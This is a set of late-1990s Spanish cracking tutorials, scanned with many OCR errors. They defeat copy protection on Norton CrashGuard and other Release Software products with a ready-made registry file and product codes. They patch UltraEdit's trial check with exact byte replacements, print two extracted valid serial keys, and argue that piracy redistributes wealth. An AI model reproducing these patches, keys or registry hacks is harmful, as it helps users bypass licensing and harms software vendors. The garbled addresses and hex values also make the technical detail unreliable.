lcs:00407834 E807F30000 Call rsagnt32!startSalesAgent Ññ Asistente de compra 
cs:00407839 83C408 add esp, 00000008 

cs:0040783C 66833D0425430000 cmp word ptr [00432504], 0000 

las:00407844 742B je 00407871 Ñ si salta, has comprado 


¡Nopeamos el asistente de compra. Esto es, sustituimos la llamada por instrucciones inonfesivas. En : 00407834 90 90 90 90 90 


Si estudiamos je 00407871 y hacemos que no vaya a la dirección 407871 aparece una ventana contándonos que se ha grabado un archivo llamado 
Rslicens.txt pero esto no hace que se active el proceso de compra, este nos es el camino. 


¡Otra comparación interesante se encuentra después de la rutina de entrada al bloque 


cs:00406752 ES59100000 call 004077B0 6 Bloque anterior cs:00406757 66392D04254300 cmp [00432504], bp HBComparación Interesante cs:0040675E 
0F84F4010000 je 00406958 cs:00406764 BF34254300 mov edi, 00432534 


Cuando nos encontremos sobre la dirección cs:0040675E cambiamos el flag de cero que estará activada (Z) y la colocamos a desactivada (z). Ahora el 
programa seguirá en cs:00406764. Pulsemos F5 y veamos que ocurre. 


Ha aparecido una ventana que nos dice que esperemos mientras nuestro programa esta siendo preparado (Please wait while your software is being 
prepared). Al fin, se 'PREPARA EL SOFTWARE" 


Nota: Si el proceso anterior se repite muchas veces conviene que cerremos todos los programas que tengamos activo e incluso el mismo Norton 
Crashguard que tengamos en la barra de tareas. 


Una vez completado este proceso habremos comprado virtualmente el Norton crashguard Deluxe. 


Observaremos que han desaparecido los ficheros CGDeluxe.dl_ y CGDeltky.dll y han aparecido dos archivos de licencia RSLICENS.txt y 
LICENSE.xxxxxx (números de licencia) Este proceso realizado en tiempo real con el Softice no trae ningún problema... pero a la hora de hacer los 
parches no encontraremos problemas con los checksum .Pero.. TRANQUILOS QUE TODO TIENE SOLUCION. 


MODIFICANDO EL REGISTRO 


Usaremos una herramienta muy útil para los crackers el programa Regmonitor (si no lo tienes consíguelo) .Observamos unas variables que lee el 
programa (no registrado) al principio y tenemos: 


HKCRultxfile FormaAiMSHAEZD( write /** Esta nos suena */ 
HKCRwltxfile FormadMSHAEZDCxlate 
HKCRuwltxfile Forma MSHA EZDC open /* Esta nos suena*/ 


Bien, basta comparar los valores antes y después de "preparar" el software, para darse cuenta que la única modificación la realiza en open. Cuando 
está registrado su valor es: 


HKEY_CLASSES_ROOT VultxfileAFormaAMSHAEZDCtopen 
00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 10 00 
08 08 00 00 10 00 00 00 - 00 00 00 00 00 00 00 00 


Esta es la forma en que se comunica al resto de utilidades que la compra ya ha tenido éxito. 
Y YA ESTA, basta con introducir este valor en el registro para que quede registrado el Norton CrashGuard Deluxe 3.0 


MSHAEZDC corresponde al programa en cuestión a comprar. Usando el regmonitor vemos que clave busca el programa a desproteger y anotamos 
el código (MSHAEZDC). 


Esta táctica se ha probado con éxito con las siguientes aplicaciones protegidas por la compañía Release Software Corporation : Norton utilities, 
Norton Uninstaller, Norton Antivirus, Xing MPEG Encoder, 


Creando un archivo de registro ya tenemos hecho un crack no destructivo ya que no modifica ningún ejecutable. 


REGEDIT4 

; (c) ESTADO+PORCINO 1998 

; Modificación de registro para Norton Crash Guard Deluxe 
; Mr.Red € otras hierbas 


[HKEY_CLASSES_ROOTXultxfilelFormatiMSHAEZDC] 
"open"=hex:00,00,00,00,00,00,00,00,00,00,00,00,00,00,10,00,08,08,00,00,10,00,00,00,00,00,00,00,00,00,00,00 


| E A q q AAA Cortar por AQUÍ q q q q A A 


Para los demás programas que usan esta protección tenemos: 


Xing MPEG Encoder códigoá MSHVEMAV 
Norton Utilities códigoa MSHVEMO0OE 

Norton Unisntaller códigoa MSHW2EHL 
Bueno ha sido largo pero ha merecido la pena. 


MORALEJA: Si quieres poner una puerta, procura que no sea de papel. 


Es el colmo de la incompetencia. Confías la venta de tu producto a un empresa que proporciona una protección ridícula que no vende tu producto si 
no que prácticamente lo regala. Por que no invertir la millonada que Symantec habrá pagado a Release Software Corporation encontrar a unos 
buenos programadores en ensamblador que hicieran una protección decente.Además, esta compañía protege y vende productos de más empresas a 
parte de Symantec. 

Basta pasarse por su web http://www.releasesoft.com y comprobar lo orgullosos que están de sus clientes. 

Realmente, no creo que esta compañía dure mucho. 


La importancia de este artículo radica en que se ha conseguido solventar con éxito la protección de una casa de Software dedicada a proteger y 
vender. Quedan a nuestros pies cientos de programas , con una protección de papel, gracias a la incompetencia de una avariciosa compañía. Mejor 
sería que diera los programas gratis, y de dejara de hacer el ridículo. 


Mr.PinK £ WKT (WHISKEY KON TEKILA ) 


Esperamos vuestras opiniones, sugerencias y ensayos en estadoporcino O hotmail.com 


En breve analizaremos tipos de protecciones mucho más interesantes. 


Recordad bebed de la fuente, buscad a +ORC en la red. 


- 
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DESCENSO A LOS INFIERNOS: 


- Mu bien y esto pa que coño me sirve. 


EL LISTADO MUERTO: 


- Manos a a la obra. 


INTRODUCCIÓN 


!Saludos Familia ! 


Empezemos este año con una de las técnicas crack más importantes "El Listado 
muerto" o "death listing''. Hasta ahora hemos visto la 'aproximación en vivo'' o "live 
approaching' con el maravilloso Softice. 


[DESCENSO A LOS INFIERNOS. 


¡Veamos de una vez por todas como se ejecuta una sentencia en el procesador, desde el 
¡inicio hasta el final. 


¡Supongamos que estamos programando en un lenguaje de Alto Nivel (C, C++, 
Pascal, Delphi, Visual Basic). Se llaman de Alto Nivel para diferenciarlos de los 
lenguajes más próximos al procesador, como el Ensamblador, a los que se llama 
lenguajes de Bajo Nivel. Cuanto más ''Alto'' programemos, más control perderemos 
¡sobre nuestro programa, y esto es un grave problema. 


¡Supongamos un programa, escrito en Alto Nivel, que pinta la frase "HOLA MUNDO" 
en pantalla. ¿ Qué pasos se siguen hasta que realmente se pinta la frase?. 


¡Nuestro programa debe de residir en un fichero, al que se denomina fichero fuente, en 
el que aparece la sentencia para pintar la frase. Este fichero no es entendible por el 
procesador, sólo es un conjunto de caracteres, mu diferente del conjunto de 0 y 1 que 
necesita para trabajar. Es aquí donde entra el compilador, transforma el fichero fuente 
'en un fichero intermedio, también llamado fichero objeto. En esta transformación se 
¡comprueba la sintaxis de las sentencias ( falta el punto y coma) y la semántica (has 
¡pasado un entero cuando se esperaba un real). El compilador realiza entonces una fase 
de linkado para reunir los distintos ficheros objeto que conforman nuestro programa 
final (aunque tengamos un único fichero fuente). En esta fase se determinan el mapeo 
final del program en memoria (que dirección de memoria va a tener cada instrucción 
del conjunto de ficheros objeto). Tras la fase de linkado, el programa final se encuentra 
'en un lenguaje llamado pseudocódigo, mu sencillote. Aquí se pueden tomar 3 vías. 


Primera: Dejar el programa como está, y que otros pogramas o librerías (como la 
'vbrun500.dll de Visual Basic) lo traduzcan (lo interpreten) a sentencias entendibles por 
el porcesador. 


Segunda: Transformar el pseudocódigo a un lenguaje de Bajo Nivel como el 
ensamblador. En tal caso, se necesitará un compilador de ensamblador para que el 
¡programa pueda ser ejecutado. OJO, el ensamblador no es entendible por el tonto 
¡procesador que sólo ve unos y ceros, son dos cosas distintas. 


¡Tecera: La más común, transformar directamente de pseudocódigo a ejecutable 


¡Un fichero ejecutable consta de unos y ceros (o de números en hexa, según se mire) 
¡ordenados de una forma especial; ordenados en instrucciones: Los 3 primeros números 
son el tipo de instrucción, los 4 siguientes el operandol, el siguiente el operador...Cada 
¡instrucción es depiezada dentro del procesador y dan a lugar a la ejecución de un 


conjunto de programas presenten dentro del procesador, son las microrutinas. Estas 
microrutinas son las encargadas de bloquear buses, activar multiplexores, dar tensión a 
un transistor o no, pa enterndernos. Accionando correctamente buses, multiplexires... 
¡se pintará relamete la frase en pantalla. 


Bien, esto es todo. 
Mu bien y esto pa que coño me sirve. 


¡Existe una correspondencia directa entre lenguaje ensablador y programa ejecutable. 
Gracias a un desensamblador (W32DASM, IDA PRO), a partir de un ejecutable 
podemos obtener el programa el lenguaje ensablador sin disponer del fichero fuente. 
Un program en ensamblador puede ser fácilmente entendido por los humanos (o eso 
dicen algunos). Esto nos da un poder tremendo a los crackers. Podemos saber como 
funciona un programa sin necesitar del programa original. Y lo que es má aún, 
independientemente del lenguaje de Alto Nivel. Todos los lenguajestienen que pasar a 
ejecutable de alguna u otra forma, y es aquí cuando usamos nuestro desensamblador y 
extraer su listado en ensablador. Da igual que programa esté hecho en Pascal, O C++, 
lo entederemos igualmente ya que leeremos ensamblador. 


EL LISTADO MUERTO 


¡La idea es sencilla. Cojemos nuestro desensamblador favorito y se lo pasamos al 
objetivo. Obtendremos un listado en ensamblador de nuestro programa a crackear. La 
técnica crack se llama Listado muerto porque entenderemos y manejaremos el 
¡programa con este listado, sin tener que ejecutarlo, con el programa muerto. A 
diferencia de cuando lanzamos el Softlce y entendemos el programa cuando se está 
ejecuntandose, cuando "vive". 


¡Hay tre ventajas fundaentales para utilizar el Listado Muerto. 


- Podemos seguir el programa fácilmemte de atrás hacia adelante, basta con pasar de 
página, no hace falta volver a ejecutatlo. 


- Es mucho más relajado imprimir y estudiar 4 páginas de código que rastrear con el 
¡SoftIce. Este es uno de los consejos de +ORC. 


- Se descubren pequeños secretos, como rutinas inactivas. 


La paciencia y la tranquilidad son dos requisitos fundamentales en un cracker. Es fácil 
perderte trazando con el SoftIce e imposible con el Listado Muerto. 


Manos a la Obra 


Una vez desensamblado el objetivo, la idea es buscar cadenas de texto interesantes, 
como "unregistered", expired”, "congratulations'' y mirar al rededor de estas 
cadenas buscando un salto mágico. Las palabras en concreto dependen del programa y 
¡son las que aparecen para recordarte que aún no te has registrado. 


CÓMO CRACKEAR UEDIT 5.0 


Objetivo: Uedit 5.0. 

Versión: 5.0 3/7/97 

Nombre del ejecutable: uedit32.exe 

Website: http://www.uedit.com 

Tamaño del ejecutable: 812.514 bytes. 

Tipo de protección: Por número de serie y temporal. 
Dificultad: Medio. 

Tiempo de crackeo: 5 minutos. 

Herramientas: W32dasms.X, Softlce. 


Siguiendo la recomendación del maestro +ORC, continuamos con el crack a nuestras 
herramientas de trabajo. En este caso nos encontramos ante un excelente editor 


hexadecimal, vital para nuestros negocios :-) 


Instalemos el programa, ejecutémoslo y veamos lo que nos encontramos. ARRJJ!!, una 


horrible ventana nos dice que tenemos 45 diás para registranos. Además tiene un bonito 
botón ''Enter Authorization Code". Pulsemos y veamos. Un típico nombre de usario y 
¡número de serie (al que le llamaré passwod o pass). Si pulsamos cuaquier guarrada en 
¡ambos, sorpresa, ningúm mensaje advirtiendo del error, ningún pitido (recordais el 


capítulo ID), nada excepto una ventana de mensaje que dice que hace falta cerrar el 


¡programa para validar el código. ¿Habrá leido lan D. Mead las lecciones de 
'Estado+Porcino?. Bien, ¿por donde atacar?. No tenemos nada que nos indique que nos 


hemos equivocado. ¿Que tal si usamos el Listado Muerto amiguitos? 


Una vez desensablado el programa y dentro del W32dasm pulsemos el botón de Strn Ref 


(el boton que está al lado del botón de impresora) para ver las cadenas de caracteres que 
aparecen en el nuetro objetivo. Que vemos, que casualidad , tenemos la frase ''Thank 
you fot supporting Shareware" , hagamos doble click y veamos donde aparecemos: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: |:00401B77(C) | 

:00401B7D 83FB09 cmp ebx, 00000009 

1:00401B80 7504 jne 00401B86 

1:00401B82 C645EC20 mov [ebp-14], 20 * Referenced by a (U)nconditional or (C)onditional Jump at 
:00401B86 8D45C8 lea eax, dword ptr [ebp-38] 

|* Possible Reference to String Resource ID=00010: '' Thank you for supporting Shareware." 


:00401B89 6A0A push 0000000A 


¡En :00401B89 tenemos una referencia a la cadena que nos interesa. Cada frase del 
¡programa tiene asociado un número, en este caso es el 0000000A y este número se les 
¡pasa al las rutinas que tienen que imprimir los mensajes. La forma tradicional de 
¡pasarle parámetros a una rutina es a través la pila mediante push (como en :00401B89 ). 
¡Los parámetros se pasan empezando por el último, es lo que se llama paso de 
¡parámetros mediate el modelo de PASCAL, existen otros modelos, pero son poco 
jutilizados. 


¡¿Estamos en el camino adecuado¿, nop, ya que el número de nuestra frase, el 0000000A 
¡(en es número 10 en decimal) es muy utilizado en cualquier programa y cada vez que 
laparezca, el desensamblador pensará que se está haciendo referencia a nuestra frase. 
¡Bien pensemos un poco. 


¡Nuestro programa está limitado por 45 días de uso, pasado ese tiempo, lo normal es que 
[nos aparezca una frase deciendo algo así como ''Evaluation time expired". Busquemos 
¡(Con el botón de la linterna ) la palabra expired pasada a una rutina mediante push a 
[ver que encontramos. 


:043F7D3 E8375DFCFF call 0040550F 

:0043F7D8 391DDC0C4A00 cmp dword ptr [004A0CDC], ebx 
:0043F7DE 758A jne 0043F76A 

:0043F7E0 8D4D10 lea ecx, dword ptr [ebp+10] 


1:0043F7E3 E829C00100 call 0045B811 


:0043F7E8 8D4D14 lea ecx, dword ptr [ebp+14] 
:0043F7EB C645FC01 mov [ebp-04], 01 
:0043F7EF E81DC00100 call 0045B811 


* Possible Reference to String Resource ID=00068: "UltraEdit 45 Day 
[Evaluation time expired!!!!" | 


:0043F7F4 6A44 push 00000044 
BINGO. No sentís el código, no percibis como estamos en el camino correcto. 


¡Si, tenemos en :0043F7F4 un push con el número asociado a la frase que buscamos y 
¡justo en :0043F7DE un salto a 0043F76A que evita imprimir el mesaje, pero el punto 
clave es ver la comprobación del salto en :0043F7D$8. Se comprueba si el contenido de 
¡EBX es igual a una dirección fija de memoria la [004A0CDC]. Las direcciones fijas son 
¡las típicas variables globales tan mal utilizadas en los programas. Tenemos una variable 
global que controla la aparición de un mensaje de error. En algún punto del programa 
debe de inicializarse [004A0CDC] con un valor ,si localizamos este trozo de código, 
estaremos en plena rutina de comprobación. ¿Facil, verdad? 


Busquemos [004A0CDC] y veamos quien la inicializa, sólo nos interesan las sentencias 
que inicializen la variable, no las sentencias que comprueban su valor. Normalmente se 
inicializa por defecto a un valor de error (indicando que no estamos registrados) y se 
linicializa corectamente cuando nos registrmemos. Conforme aparecen occurencias de 
nuestra variable glabal sabemos que estamos en el buen camino porque siempre está 
¡rodeada de mensajes de error o de felicitación. 


Buscando [004A0CDC] encontramos las siguientes sentencias que modifican la variable 
(el resto de apariciones son comprobaciones del valor) 


:00405541 893DDC0C4A00 mov dword ptr [004A0CDC], edi 
:004056A3 891DDC0C4A00 mov dword ptr [004A0CDC], ebx 
:004057D4 8325DC0C4A0000 and dword ptr [004A0CDC], 00000000 
:00426924 891DDC0C4A00 mov dword ptr [004A0CDC], ebx 


:0043F684 C705DC0C4A0001000000 mov dword ptr [004A0CDC], 00000001 


Que tenemos aquí. Parece lógico pensar que en :004057D4 tenemos la incialización por 
defecto, ya que un AND con ceros da cero. La sentencia contraria la tenemos en 
:0043F684 que mueve 1 a la variable, esto sin duda indica que nos hemos registrado. 
También podría ser al revés, cero registrado, uno no registrado, pero este no es el caso. 
¡Basta ejecutar el Softice y poner bpr 004A0CDC 004A0CDC rw, la primera 
modificación debe ser la asignación por defecto, en este caso la :004057D4. Por tanto solo 
debemos centrarnos en la asignación a uno :0043F684, olvidando el resto de 
asignaciones. Esto es un axioma fundamental ante la duda, elige siempre la solución más 
sencilla. Bien, veamos que hay entorno a la :0043F684 


:0043F65C E89A560300 call 00474CFB 

:0043F661 8B7804 mov edi, dword ptr [eax+04] 

:0043F664 8B4514 mov eax, dword ptr [ebp+14] 

:0043F667 48 dec eax 

:0043F668 7478 je 0043F6E2 

:0043F66A 48 dec eax 

:0043F66B 0F85F9000000 jne 0043F76A 

1:0043F671 391DDC0C4A00 cmp dword ptr [004A0CDC], ebx 
:0043F677 0F85DA 010000 jne 0043F857 

:0043F67D 833DBC024A0000 cmp dword ptr [004A02BC], 00000000 
:0043F684 C705DC0C4A0001000000 mov dword ptr [004A0CDC], 00000001 


Tenemos diversos saltos que evitan nuestra asignación a uno. El primer salto, sestá en 
:0043F668 7478 je 0043F6E2 que tal si lo cambiamos por EB1A ¡mp 43F684. Osea, 
siempre saltamos a 43F684 evitando las comprobaciones de :0043F66B y :0043F677.El 
código EB es la instrucción de salto incondincional JMP, 1A es el número de bytes desde 
la sentencia condicional hasta la sentencia donde queremos saltar. Fácil, ¿verdad?. 


Perfecto, rula. Basta con buscar en el ejecutable uedit32 la secuencia 8$B451448747848 y 
cambiarla por 8B451448EB1A48. Pero hay un peque problema, el crack funciona pero 
no tenemos un número de serie correcto. En principio basta, pero pensando un poco 


¡podremos sacar nuestro propio número de Serie. ¿ Qué se os ocurre? 


¡Sip, exactamante,¿ que tal si le seguimos la pista a nuestro número de serie basura y 
¡vemos con quién se comparará? . La pregunata es, donde coloco un bpx para pararme 
justo antes de que se compruebe mi número de serie. La respuesta es sencilla, en 
:43F618 (echarle un vistazo al listado muerto) comienza la rutina en la que se asigna a 1 
nuestra variable glabal. Este puede ser un buen comienzo. Abrimos el Softice con el 
¡uedit, ponemos nuestro nombre Estado+Porcino y un número basura 1212121212121212 
. Cerramos el uedit y lanzamos de nuevo el SoftIce poniendo la sentencia bpx 43F618. 
¡Aparecemos en :43F618, ahora es el momento de buscan nuestro número de serie con s 


30:00 1 HH 1212121210 encontramos es :942F9C (esta direcciónpuede cambiar en tu 


¡ordenador). Borramos el punto de ruptura anterior con bc O y creamos uno nuevo con la 
dirección donde está nuestra password con bpr 942F9C 942F9C+f rw seguimos adelante 


¡con Crtl+D para ver quien caen en buestra trampa. Aparecemos en :40B73A con varios 
¡movsd , nuestra password se está copiando en otro sitio. La sentencia movsd, copia 
¡caracteres de ees:esi a ees:edi. Pongamos en el Softlce d ees:edi para ver como realmente 
se va a copiar, además pongamos otro punto de ruptura en la nueva posición de nuestra 
¡password con bpr ees:edi ees:edi+f rw .Curiosamente, si nos movemos un poco con los 
¡cursores por ees:edi aparecen las passwords correctas, pero todavía no es el momento. 
¡Lancemos de nuevo el Softlce con Crt1+D y aparecemos en :444FOE ,aquí encontramos 
'una pequeña comprobación, en ecx tenemos nuestra pass (para comprobarlo basta con 
¡poner d ecx) y en edx apuntamos a una zona de nuestro nombre, concretamente a 
'"tado+Porcino". Esto no es exactamente lo qu buscamos, así que sigamos adelante con 
¡Crtl+D y aparecemos en :444EBO con una comprobación entre edx y ecx a través de al. 
Curiosamente edx apunta a nuestra pass y ecx apunta a Y2+cHdcBd6=DBC/P este 
churro es la pass correcta, si seguimos con Crt1+D aparecemos en el mismo sitio con edx 
¡apuntando a nuestra pass y ecx apunta a JVWKTUUTHO02166710 otra pass correcta. A lo 
largo de la evolución del programa desde sus primeras versiones, se ha cambiado 2 veces 
de generador de pass por cuestiones de seguridad, ¡qué estúpidos!. Por eso la doble 


comprobación, ver si nuestra pass es del antiguo generador o del nuevo. 


¡Eso es todo por ahora, no seais unos descerebrados y utilicéis mi pass, buscad la vuestra, 
es mu sencillote. 


¡Espero vuestras opiniones, sugerencias y ensayos en estadoporcino Ohotmail.com 
¡En breve analizaremos tipos de protecciones mucho más interesantes. 


¡Recordad bebed de la fuente, buscad a +ORC en la red. 
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UN POCO DE TODO: 


¡Saludos Familia ! 


¡He decidido crear esta serie de capítulos con un objetivo puramente educativo (sin 
ningún tipo de obscuro interés comercial). Mi objetivo es ayudar a los nuevos crackers 
en sus primeros pasos. 


¡Agradecimientos 


Al TodoPoderoso +0RC, a su acólito +FRAVIA y a los miembros de WKT por su 
¡apoyo. 


¿Qué es eso de crackear? 


Crackear es el arte de reventar protecciones software/hardware con fines intelectuales, 
¡personales pero no lucrativos. Crackear también se llama ingeniería inversa (Reverse 
Engineering), ya que sin el programa fuente se es capaz de analizar el comportamiento 
del programa y modificarlo para tus intereses. 


¿Por qué crackear? 


Vivimos en un una sociedad que da asco. Es inconcebible que se destruyan o penalicen 
la producción de productos básicos (cereales,lácteos...) en aras de una estabilidad de 
precios.Vivimos en una sociedad donde el 95% de la gente se ve sometida al control de 
un 5 %. Toda persona debería tener un mínimo de recursos para ser feliz,pero esto no 
es así. 


El noble arte del crakeo es una herramienta para distribuir la riqueza entre la 
sociedad. Si necesitas un programa (que tienes en un CD-ROM) y no tienes una cuenta 
en un banco USA, ni 30 dólares, ¿por qué narices tienes que esperar y pagar si lo 
necesitas?, crackealo y publica el crack en Internet. Así ayudarás a la gente menos 
¡afortunada que está axifiada por esta sociedad desigualitaria. 


¿A quién va dirigido este curso? 


Este curso va dirigido a toda persona con interés en el crack y/o con la filosofía crack. 


Sin olvidar a los programadores. 


¿Qué es lo que vamos a aprender? 


Dejaremos de un lado el añorado DOS, para centrarnos en cracks para programas en 
WO95. 


¿No estaremos quitando el pan a los programadores de aplicaciones? 


Los programadores viven muy bien a costa de los royaltis que pagan las grandes 
empresas y esos repugnantes yupis encorbatados con escased de neuronas. Además, un 
programa crakeado es más conocido y utilizado que uno que no lo esté. Digamos que el 
crack es una forma de publicidad. Baste recordar el compilador de Pascal de la casa 
Borland. Originalmente fue copieteado y distribuido casi libremente hasta la saciedad. 
Borland conocía este hecho y por eso no introdujo ningún tipo de protección. Al cabo 
de poco tiempo, esos estudiantes se convirtieron en programadores que reclamaban a 
sus empresas la compra del compilador que sabían utilizar, el Pascal de Borland. Si las 
casas de soft ya son ricas sin nuestro dinero, ¿a que estado de corrupción se llegaría si 
lo tuvieran?. Aunque parezca extraño este ensayo está dedicado a formar a los 
programadores , mostrándoles sus defectos y el camino para producir software de 
calidad. 


En último caso depende de la conciencia de cada uno, si crees que un programador ha 
realizado una buena aplicación, que te es útil y que además está bien programada, 
entonces obra adecuadamente y recompénsalo registrándote. A decir verdad sólo he 
encontrado un programa de este estilo 


¿Qué necesito pa esto de crakear? 


- Interés y PazY Ciencia. 


- Algún conocimiento de ensamblador. Cuanto más conozcas mejor crackearás, pero 
para este curso mas bien poco, intentaré hacer las cosas fáciles. 


- Ayuda de otro cracker más experto (por ejemplo Estado+Porcino) 


IDEAS BÁSICAS SOBRE CRACKING 


¡Un programa no es más que un montón de instrucciones (haz, esto, haz lo otro), una 
tras otra. Estas instrucciones, (en general) están en memoria, parte de ellas se encargan 
de impedir la ejecución del resto (el verdadero programa). Resumiendo, tienes un 
bonito programa tras una puerta (esquema de protección), nuestro objetivo es reventar 
lla puerta, buscar la llave,pasar por las rendijas,quemarla..., como puedes ver una 
cantidad inagotable de ataques. 


'Un pequeño inciso, sólo puedes reactivar instrucciones que se encuentren en el 
¡programa. Por ejemplo, si se ha desactivado la opción de salvar, puede ser que el 
conjunto de sentencias para salvar el programa esté presente pero desactivado, o bien 
¡que simplemente no esté. Si están las sentencias, se pueden reanimar, sino están 
¡entramos en un mundo diferente, una evolución del cracking, la apasionante 
Reconstrucción Software, pero eso será tema de otro capítulo. 


¡Herramientas CRACK 


¡Demos un breve repaso a las principales herramientas que utilizaremos a lo largo del 
¡curso. Existen otras muchas herramientas que las comentaré cuando nos sean 
necesarias. 


¡Editor hexadecimal 


Los programas no son más que un conjunto de instrucciones y cada instrucción no es 
¡más que un conjunto de bits, pero donde demonios se guardan esos bits?. 


¡Los bits del programa se localizan en los ficheros, p.e. las instrucciones del programa 
de compresión arj se guardan en el fichero arj.exe. Hay algunos programas que no 
¡guardan todas sus instrucciones en único fichero, si no en varios, un ejemplo de esto 
¡son los programas que utilizan librerías dinámicas (o dil) 


Un editor hexa, no es más que un programa, que permite "'editar'' los ficheros de 
instrucciones de otros programas, osea, que permite ver,modificar,copiar,pegar... los 
bits de los programas. Para simplificar la cosa no se muestran los bits a pelo, sino que 
¡se muestran en hexadecimal, de ahí su nombre. Nosotros lo utilizaremos para alterar el 
¡comportamiento de los programas. Supongamos que conocemos la instrucción 
sentencia de la rutina de protección que debemos modificar, sea jz 23 y queremos 
¡modificarla por jnz 23, bien como toda instrucción no es más que un conjunto de bits, 
¡sea 0110 para jz 23 y 1001 para jnz 23, sólo nos queda buscar estos bits dentro del 
fichero ejecutable del programa (que es, en general, el contiene las sentencias del 
¡programa). Como usamos un editor hexa, debemos buscar la secuencia de un unos y 
¡ceros en hexa en el fichero del programa que queremos modificar. Si la secuencia que 
buscamos es muy común deberemos utilizar las instrucciones que se encuentran 
entorno a la instrucción a modificar. 


¡Esto es muy importante, sólo debe existir una localización del patrón de búsqueda en el 
fichero, si existe más de una, debemos añadir a la búsqueda las sentencias de alrededor, 
¡sino se corre el riego de modificar la sentencia equivocada, lo que provoca casi siempre 
un "cuelgue". 


Un no es más que una modificación de las instrucciones de un fichero, así pues para 
hacer un crack debemos saber que instrucciones modificar y en qué fichero. Una vez 
crackeado el fichero, el programa se comportará siguiendo la nueva sentencia que le 
hemos modificado. 


Hay un montón de editores hexa, yo os recomiendo UltraEdit-32 Professional, os lo 
podéis bajar de http://ftpsearch.ntnu.no/ 


(excelente herramienta de búsqueda en la Web, utilízala cuando no encuentres algún 
¡fichero) busca w32dasm. Yo utilizo la versión 4.31a. Cada cracker tiene su editor 
favorito, !encuentra el tuyo!. Este programa es shareware, así que tendrás que 
crackearlo, recuerda : lo primero que tienes que crakear son tus propias herramientas. 
Si no puedes crackearlo, busca otro editor hexa, los hay a montones. 


¡Desensamblador 


Un desensamblador toma un fichero de instrucciones en hexa y lo convierte a lenguaje 
ensamblador. El lenguaje ensamblador, es el conjunto de sentencias que entiende el 
microprocesador (tu Pentium o mi 486). El procesador es el corazón del ordenador, 
todas las sentencias son ejecutadas por él y sólo por él. Por ejemplo un 43 en hexa se 
transforma en inc eax. Se necesitan algunos conocimientos de ensamblador pa esto de 
crackear. 


Nosotros usaremos el desensamblador para crakear con la técnica de la lista muerta 
que veremos más adelante. 


Puedes pillar un magnífico desensamblador para W95 en 
¡http://www/expage.com/page/w32dasm , €s Shareware, así que deberás crackearlo. 
¡Próximamente le dedicaremos un capítulo al w32dasm y aprenderemos a crackearlo. 
'Yo utilizo la versión 8.9, aunque una posterior es también útil. 


Debugger 


Un debugger permite ejecutar instrucción a instrucción (instrucciones en ensamblador, 
se entiende) un programa, por tanto también ejecutará instrucción a instrucción la 
rutina de protección, ya que es parte del programa. Esto nos permitirá analizar su 
comportamiento. 


¡El mejor debugger para W95 es sin duda el Softice quo te lo puedes bajar de 
¡http://www.numega.com , es sin duda uno de los mejores programas que he visto en mi 
vida. Te recomiendo que te bajes también los manuales. El Softice es una de las mejores 


¡herramientas cuanto más domines al Softice, mejor crakearás, y te aseguro que se 
pueden realizar verdaderas maravillas con él. Para trazar (esto es, pasar el debug) a 
programas MS-DOS, puedes utilizar versiones anteriores del Softice o utilizar algunos 
de los excelentes debugger que hay para Dos como el SymbDebug. 


Os indicaré un par de consejos y trucos para el Softice. 
--> Instalación 


Haz la prueba de pantalla, si te la saltas, lo más seguro es que cuando actives el Softice 
se te quede la pantalla a rayas. Busca el driver de la tarjeta de vídeo que tengas 
instalada en W95 dentro de la lista que se ofrece. Aunque la encuentres, haz la prueba 
de pantalla, es posible que no funcione correctamente. Si no encuentras tu tarjeta de 
vídeo o tienes problemas de pantalla, corta la instalación y selecciona ''Adaptador de 
Vídeo Standard VGA", reinstala el Softice y utiliza ese mismo driver para la prueba de 
pantalla. Si sigues teniendo problemas te remito a la Doc del Softice (que deberías 
haberte bajado). Particularmente, con el adaptador Standard VGA no he tenido nunca 
problemas. Hay por ahí sueltos una ampliación de drivers de tarjetas para Softice, 
búscalos si no quieres pasa a la VGA Standard. 


Activa la opción de ratón, te evitará escribir bastantes secuencias hexa de instrucciones, 
te permitirá moverte libremente por las ventanas, seleccionar, copiar y pegar texto así 
como redimensionar las ventanas. 


--->Configuración 


El Loader es una pequeña utilidad que permite especificar el programa que queremos 
depurar y además nos permite configurar el Softice, En Edit/Softlce Initialization 
Settings/Initialization string pon X;wl;wr;wd7; code on; y en Histoy Buffer Size pon 
512 

Abre el fichero winice.dat (dentro del directorio de instalación del Softice) , toda línea 
del tipo EXP=c:1windowsisystemisystem.drv , quítale el punto y como inicial. 


--->Ejecución 


El Softice debe cargarse siempre antes que W9S5. Si estas en W95, reinicializa en modo 
MS-DOS y ejecuta WINICE.EXE, este cargará el Softice y W95. Te recomiendo que 
utilices un fichero bat. 


Las ventanas que aparecen son 


Ventana de registros de la CPU (wr). A los típicos se ha añadido una E así se diferencia 
¡los registros normales que admiten 16 bits, de los registros que soportan 32 bits. Por 
ejemplo, ax se llama ahora eax. Siempre podremos referencias a ax, sabiendo que nos 
quedaremos con 16 bits últimos de eax. 


¡Ventana de datos de la CPU (wd). Muestra la memoria en formato hexa, ahí se pueden 


lapreciar los datos que maneja el programa, entre otras cosas. 


'Ventana de código (wc). Muestra, la dirección de memoria en la que se encuentra la 
instrucción, la codificación hexa de la instrucción y la instrucción en ensamblador. 


¡Ventana de control, el la que aparece arriba el nombre del programa que estamos 
¡trazando. Aquí es donde introduciremos los comandos del SoftlIce. 


¡He aquí algunos comandos fundamentales para el Softice: 
¡CTRL+D 


¡Conmuta de W95 al Softice y viceversa. No te asustes por el pantallazo ni por el aspecto 
¡cutre inicial, llegarás a quererlo, créeme. Si salen rayas, vuelve a leer el apartado -- 
>Instalación 


¡F4 


¡Estando en Softice, te permite echar un ojo al estado actual en W95 sin necesidad de 
conmutar. 


¡FS 


¡Ejecuta una instrucción, las modificaciones en los registros del sistema aparecen de 
¡diferente color. Si la instrucción es una llamada a una rutina, se ejecutarán una a una 
¡todas las instrucciones de la rutina llamada. 


¡FIO 


¡Ejecuta una instrucción, las modificaciones en los registros del sistema aparecen de 
¡diferente color. Si la instrucción es una llamada a una rutina, se ejecutan de golpe todas 
¡las sentencias de la rutina llamada. 


¡FI1 


¡Ejecuta de golpe todas las instrucciones de la rutina actual y se para el la instrucción 
¡siguiente de la rutina padre que llamó a esta rutina. Esto nos permite trazar al padre, 
¡estando en una rutina hija. En cuanto la uses menudo verás que no es tan complicado 
[como parece. 


¡FI2 
¡Ejecuta todas las sentencias hasta el primer ret (incluido) 
¡bpx nombreRutina 


¡Salta al Softice cuando se ejecuta la rutina cuyo nombre es nombreRutina. Ejemplo 
¡bpx messageboxa saltará al Softice cuando el programa muestre una ventana de 


